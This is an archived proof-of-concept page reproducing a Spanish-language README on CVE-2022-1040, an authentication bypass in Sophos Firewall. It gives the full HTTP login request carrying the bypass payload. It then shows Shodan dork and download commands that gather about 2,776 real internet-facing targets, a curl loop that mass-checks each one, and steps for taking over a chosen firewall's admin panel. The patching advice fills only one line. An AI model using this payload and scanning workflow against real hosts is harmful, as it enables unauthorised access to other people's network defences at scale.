Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-1040 PoC — Sophos Firewall 授权问题漏洞

Source
https://github.com/jam620/Sophos-Vulnerability
Associated Vulnerability
Title:Sophos Firewall 授权问题漏洞 (CVE-2022-1040)
Description:Sophos Firewall是英国Sophos公司的一款防火墙。 Sophos Firewall version v18.5 MR3 版本及之前版本的 User Portal 和 Webadmin 模块存在授权问题漏洞,该漏洞源于User Portal 和 Webadmin 模块存在身份认证绕过漏洞。攻击者通过该漏洞可以远程执行代码。
Description
CVE-2022-1040
Readme
# Análisis Vulnerabilidad CVE-2022-1040 (Sophos RCE)

En el grupo de investigación [Toasec,](http://toadsec.io/) dedicado a ciberseguridad ofensiva nos dimos la tarea de realizar el análisis sobre esta vulnerabilidad en los firewalls de Sophos.

Dicha vulnerabilidad como muchas otras pueden ser notificadas y encontradas si sabes buscar en [twitter](https://twitter.com/search?q=CVE-2022-1040&src=typed_query&f=top), en donde observamos que desde el mes de marzo se comenzaron a observar artículos sobre el RCE

<img src="img/imagen1.png" style="zoom:50%;" />

Fuente: https://www.bleepingcomputer.com/news/security/critical-sophos-firewall-vulnerability-allows-remote-code-execution/

Si observamos los repositorios que tienen las [POC](https://github.com/APTIRAN/CVE-2022-1040) 

```http
POST /webconsole/Controller HTTP/1.1
Host: 127.0.0.1:4444
Cookie: JSESSIONID=c893loesu9tnlvkq53hy1jiq103
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: https://127.0.0.1:4444
Referer: https://127.0.0.1:4444/webconsole/webpages/login.jsp
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 192

mode=151&json={"username"%3a"admin","password"%3a"somethingnotpassword","languageid"%3a"1","browser"%3a"Chrome_101","accessaction"%3a1,+"mode\u0000ef"%3a716}&__RequestType=ajax&t=1653896534066

```

Podemos observar el payload (**mode=151&json=**) el cual es lo que nos permite realizar el bypass al login y observamos de igual manera el endpoint **webconsole/webpages/login.jsp**

Ahora pasamos analizar  los ataques en greynose y verificar si esta siendo explotado activamente 

![](img/imagen2.png)

Una vez identificamos el endpoint y comprobamos algunas rutas usadas en los ataques con [greynoise](https://viz.greynoise.io/) podemos crear nuestro dork en shodan `title:"Sophos" html:"UserPortalLogin.js" product:"Sophos Cyberoam (appliance)"` este dork es el que hemos identificado con mayor probabilidad, pero debemos recordar que las versiones vulnerables son **Sophos XG115w Firewall 17.0.10 MR-10**

![](img/imagen3.png)



### Requisitos

1. [VPS de Preferencia Ubuntu Server 20.04](https://www.vultr.com/?ref=8403796-6G)
2. Una cuenta de Shodan configurada para usar la CLI y su API
3. Instalar **jq** 



### POC

1. Preparación de los targets con shodan CLI

`shodan download --limit -1 sophos.gz title:"Sophos" html:"UserPortalLogin.js" product:"Sophos Cyberoam (appliance)" port:443`

Procedemos a verificar los datos

<img src="img/imagen4.png" alt="imagen4" style="zoom:70%;" />

Vamos a parsear los datos a un formato que nos permita la automatización y observamos que existe 2776 posibles targets

`shodan parse --fields ip_str,port --separator , sophos.gz > sophos.txt`

![](img/imagen5.png)

Ahora debemos limpiar y quitar las comas para que sea más fácil trabajar con el [onliner](https://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker)

`sed  's/,/:/g' sophos.txt > sophos-parseado.txt`

<img src="img/imagen6.png" style="zoom:70%;" />

Ya podemos trabajar con el onliner en un formato más adecuado

```shell
cat sophos-parseado.txt | while read host do; do curl --connect-timeout 10 -ks -H "X-Requested-With: XMLHttpRequest" -X POST "https://$host/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"👽":"TEST"\}" | grep -q 'Session Expired' && printf "$host \033[1;41mVulnerable a CVE-2022-1040 (Sophos RCE)\e[0m\n"; done; 
```

![](img/imagen7.png)



2. Explotación

Una vez verificamos nuestros targets solamente es cuestión de seleccionar uno y realizar la prueba, accediendo al panel de login

![](img/imagen8.png)

Interceptamos la petición de login y la enviamos al responder

![](img/imagen9.png)

Modificamos la petición con el payload y debemos tener una redirección a la administración del firewall

![imagen10](img/imagen10.png)

Probamos accediendo a la ruta **index.jsp**

![imagen11](img/imagen11.png)

Hemos comprobado que la vulnerabilidad esta presente en el objetivo, de igual manera se encuentra activa en muchos hosts, no obstante la fecha se ha podido observar una mitigación amplia en cuanto a otras vulnerabilidad.

En estos casos lo primordial es realizar una actualización e instalación de los parches de seguridad a penas estén a disposición de parte de los fabricantes.
File Snapshot

 [4.0K]  /data/pocs/0055ec0d4fafba2e2a390afd43604bc9544eeea1
├── [4.0K]  img
│   ├── [ 82K]  imagen10.png
│   ├── [180K]  imagen11.png
│   ├── [2.6M]  imagen1.png
│   ├── [293K]  imagen2.png
│   ├── [368K]  imagen3.png
│   ├── [106K]  imagen4.png
│   ├── [ 44K]  imagen5.png
│   ├── [162K]  imagen6.png
│   ├── [163K]  imagen7.png
│   ├── [635K]  imagen8.png
│   └── [ 55K]  imagen9.png
└── [4.5K]  README.md

1 directory, 12 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.